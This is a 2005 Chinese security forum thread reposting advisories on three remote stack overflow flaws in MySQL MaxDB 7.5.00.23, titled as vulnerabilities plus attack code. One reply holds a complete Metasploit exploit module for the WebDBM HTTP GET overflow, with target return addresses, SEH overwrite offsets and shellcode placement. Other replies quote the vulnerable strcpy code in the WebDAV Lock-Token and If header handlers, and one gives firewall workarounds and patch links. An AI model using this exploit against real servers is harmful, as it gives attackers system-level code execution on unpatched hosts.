|
 | 作者: BrideX [bridex]
 论坛用户 |
登录 |
| MySQL MaxDB HTTP GET请求远程溢出漏洞 发布日期:2005-04-28 更新日期:2005-04-28 受影响系统: MySQL AB MaxDB 7.5.00.23 不受影响系统: MySQL AB MaxDB 7.5.00.26 描述: -------------------------------------------------------------------------------- BUGTRAQ ID: 13368 CVE(CAN) ID: CAN-2005-0684 MySQL的MaxDB是SAP AG开放源码数据库SAP DB的增强版本,是对MySQL数据库服务器的补充。 远程利用MySQL MaxDB中的栈溢出漏洞可能允许攻击者以系统权限执行任意代码。漏洞起因是没能正确的处理包含有百分号(%)的HTTP GET请求。如果攻击者能够发布指定了百分号的HTTP GET请求,而请求后有超长字符串做为文件参数,就可能发生栈溢出。攻击者必须发送大约4,000字节的长度才能覆盖进程SEH。攻击者还可能覆盖程序保存的指令指针。 <*来源:iDEFENSE Labs (labs@idefense.com) H D Moore (hdm@metasploit.com) 链接:http://www.idefense.com/application/poi/display?id=234&type=vulnerabilities&flashstatus=false *> [此贴被 BrideX(bridex) 在 05月02日13时25分 编辑过] [此贴被 BrideX(bridex) 在 05月02日13时31分 编辑过] |
| 地主 发表时间: 05-05-02 13:17 |
| 回复: BrideX [bridex] 论坛用户 |
登录 |
|
攻击代码 package Msf::Exploit::maxdb_webdbm_get_overflow; use base "Msf::Exploit"; use strict; use Pex::Text; my $advanced = { }; my $info = { 'Name' => 'MaxDB WebDBM GET Buffer Overflow', 'Version' => '$Revision: 1.1 $', 'Authors' => [ 'H D Moore <hdm [at] metasploit.com>' ], 'Arch' => [ 'x86' ], 'OS' => [ 'win32', 'win2000', 'winxp', 'win2003'], 'Priv' => 1, 'UserOpts' => { 'RHOST' => [1, 'ADDR', 'The target address'], 'RPORT' => [1, 'PORT', 'The target port', 9999], }, 'Payload' => { 'Space' => 2052, 'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x40", 'Prepend' => "\x81\xc4\x54\xf2\xff\xff", # add esp, -3500 'Keys' => ['+ws2ord'], }, 'Description' => Pex::Text::Freeform(qq{ This module exploits a stack overflow in the MaxDB WebDBM service. This service is included with many recent versions of the MaxDB and SAPDB products. This particular module is capable of exploiting Windows systems through the use of an SEH frame overwrite. The offset to the SEH frame may change depending on where MaxDB has been installed, this module assumes a web root path with the same length as: C:\\Program Files\\sdb\\programs\\web\\Documents }), 'Refs' => [ ['URL', 'http://www.idefense.com/application/poi/display?id=234&type=vulnerabilities'], ], 'DefaultTarget' => 0, 'Targets' => [ ['MaxDB 7.5.00.11 / 7.5.00.24', 0x1002aa19 ], # wapi.dll ['Windows 2000 English', 0x75022ac4 ], # ws2help.dll ['Windows XP English SP0/SP1', 0x71aa32ad ], # ws2help.dll ['Windows 2003 English', 0x7ffc0638 ], # peb magic :-) ['Windows NT 4.0 SP4/SP5/SP6', 0x77681799 ], # ws2help.dll ], 'Keys' => ['maxdb'], }; sub new { my $class = shift; my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); return($self); } sub Check { my $self = shift; my $target_host = $self->GetVar('RHOST'); my $target_port = $self->GetVar('RPORT'); my $s = Msf::Socket::Tcp->new( 'PeerAddr' => $target_host, 'PeerPort' => $target_port, 'LocalPort' => $self->GetVar('CPORT'), 'SSL' => $self->GetVar('SSL'), ); if ( $s->IsError ) { $self->PrintLine( '[*] Error creating socket: ' . $s->GetError ); return $self->CheckCode('Connect'); } $s->Send("HEAD / HTTP/1.0\r\n\r\n"); my $res = $s->Recv(-1, 5); $s->Close; if ($res =~ m/Server:\s*(SAP-Internet-SapDb-Server.*)$/m) { my $banner = $1; $banner =~ s/\r//g; $self->PrintLine("[*] WebDBM detected: $banner"); return $self->CheckCode('Detected'); } $self->PrintLine("[*] SAP/MaxDB WebDBM server was not detected"); return $self->CheckCode('Safe'); } sub Exploit { my $self = shift; my $target_host = $self->GetVar('RHOST'); my $target_port = $self->GetVar('RPORT'); my $target_idx = $self->GetVar('TARGET'); my $shellcode = $self->GetVar('EncodedPayload')->Payload; my $target = $self->Targets->[$target_idx]; $self->PrintLine( "[*] Attempting to exploit " . $target->[0] ); my $s = Msf::Socket::Tcp->new( 'PeerAddr' => $target_host, 'PeerPort' => $target_port, 'LocalPort' => $self->GetVar('CPORT'), 'SSL' => $self->GetVar('SSL'), ); if ( $s->IsError ) { $self->PrintLine( '[*] Error creating socket: ' . $s->GetError ); return; } # Trigger the SEH by writing past the end of the page after # the SEH is already overwritten. This avoids the other smashed # pointer exceptions and goes straight to the payload. my $path = Pex::Text::AlphaNumText(16384); substr($path, 1586, length($shellcode), $shellcode); substr($path, 3638, 5, "\xe9" . pack('V', -2052)); substr($path, 3643, 2, "\xeb\xf9"); substr($path, 3647, 4, pack('V', $target->[1])); $s->Send("GET /%$path HTTP/1.0\r\n\r\n"); $s->Recv(-1, 5); return; } |
| B1层 发表时间: 05-05-02 13:20 |
| 回复: BrideX [bridex] 论坛用户 |
登录 |
|
临时解决方法: 如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁: * 部署防火墙,访问控制列表或其他TCP/UDP限制机制,限制对管理系统和服务的访问。 厂商补丁: MySQL AB -------- 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载7.5.00.26版本: http://dev.mysql.com/downloads/maxdb/7.5.00.html iDEFENSE -------- iDEFENSE已经为此发布了一个安全公告(iDEFENSE-234)以及相应补丁: iDEFENSE-234:MySQL MaxDB Webtool Remote Stack Overflow Vulnerability 链接:http://www.idefense.com/application/poi/display?id=234&type=vulnerabilities&flashstatus=false |
| B2层 发表时间: 05-05-02 13:21 |
| 回复: BrideX [bridex] 论坛用户 |
登录 |
|
MySQL MaxDB WebDAV Lock Token远程栈溢出漏洞 发布日期:2005-04-28 更新日期:2005-04-28 受影响系统: MySQL AB MaxDB 7.5.00.23 不受影响系统: MySQL AB MaxDB 7.5.00.26 描述: -------------------------------------------------------------------------------- BUGTRAQ ID: 13369 CVE(CAN) ID: CAN-2005-0684 MySQL的MaxDB是SAP AG开放源码数据库SAP DB的增强版本,是对MySQL数据库服务器的补充。 远程利用MySQL MaxDB中的栈溢出漏洞可能允许攻击者以系统权限执行任意代码。漏洞起因是对WebDAV功能缺少边界检查。如果攻击者能够以unlock方式发送有超长Lock-Token字符串的HTTP请求的话,就可能发生栈溢出。 <*来源:iDEFENSE Labs (labs@idefense.com) 链接:http://www.idefense.com/application/poi/display?id=235&type=vulnerabilities&flashstatus=false *> |
| B3层 发表时间: 05-05-02 13:26 |
| 回复: BrideX [bridex] 论坛用户 |
登录 |
|
相关攻击代码 MaxDB_ORG/sys/src/SAPDB/WebDAV/Handler/WDVHandler_CommonUtils.c: WDVH_Bool getLockTokenHeader(sapdbwa_HttpRequestP request, WDVH_Char *sLockToken, WDVH_Char *errormsg) { WDVH_Char *temp1, *temp2, *temp4, *temp5; WDVH_UInt4 length; WDVH_Char temp3[WDVH_MAX_IF_HEADER_LEN]; if (request==NULL || sLockToken==NULL || errormsg==NULL) return WDVH_False; temp4 = (char*)sapdbwa_GetHeader(request,"Lock-Token"); if (temp4 != NULL) { strcpy(temp3,temp4); [...] 变量temp3是个固定长度的栈缓冲区。sapdbwa_GetHeader()函数为Lock-Token返回用户提供的值,然后使用strcpy()调用将这个用户提供的值拷贝到固定大小的缓冲区。由于没有边界检查,攻击者可能溢出栈缓冲区,覆盖栈内存。 |
| B4层 发表时间: 05-05-02 13:27 |
| 回复: BrideX [bridex] 论坛用户 |
登录 |
|
MySQL MaxDB WebDAV IF参数远程栈溢出漏洞 发布日期:2005-04-28 更新日期:2005-04-28 受影响系统: MySQL AB MaxDB 7.5.00.23 不受影响系统: MySQL AB MaxDB 7.5.00.26 描述: -------------------------------------------------------------------------------- BUGTRAQ ID: 13378 CVE(CAN) ID: CAN-2004-1274 MySQL的MaxDB是SAP AG开放源码数据库SAP DB的增强版本,是对MySQL数据库服务器的补充。 远程利用MySQL MaxDB中的栈溢出漏洞可能允许攻击者以系统权限执行任意代码。漏洞起因是对WebDAV功能缺少边界检查。如果攻击者能够以unlock方式发送有超长IF参数字符串的HTTP请求的话,就会发生栈溢出。 <*来源:iDEFENSE Labs (labs@idefense.com) 链接:http://www.idefense.com/application/poi/display?id=236&type=vulnerabilities&flashstatus=false *> |
| B5层 发表时间: 05-05-02 13:28 |
| 回复: BrideX [bridex] 论坛用户 |
登录 |
|
相关攻击代码 WDVH_Bool getIfHeader(sapdbwa_HttpRequestP request, WDVH_Char *sIf, WDVH_Int4 len) { WDVH_Char *temp1, *temp2, *temp4, *temp5; WDVH_UInt4 length; WDVH_Char temp3[WDVH_MAX_IF_HEADER_LEN]; if (request==NULL || sIf==NULL) return WDVH_False; strcpy(sIf,""); temp4 = (char*)sapdbwa_GetHeader(request,"If"); if (temp4 != NULL) { strcpy(temp3,temp4); 变量temp3是固定长度的栈缓冲区。sapdbwa_GetHeader()函数为If参数返回用户提供的值,然后使用strcpy()调用将这个用户提供的值拷贝到固定大小的缓冲区。由于没有任何边界检查,因此可能覆盖栈缓冲区,覆盖栈内存。 |
| B6层 发表时间: 05-05-02 13:29 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 黑客进阶 标题: MySQLMaxDB最新相关漏洞+攻击代码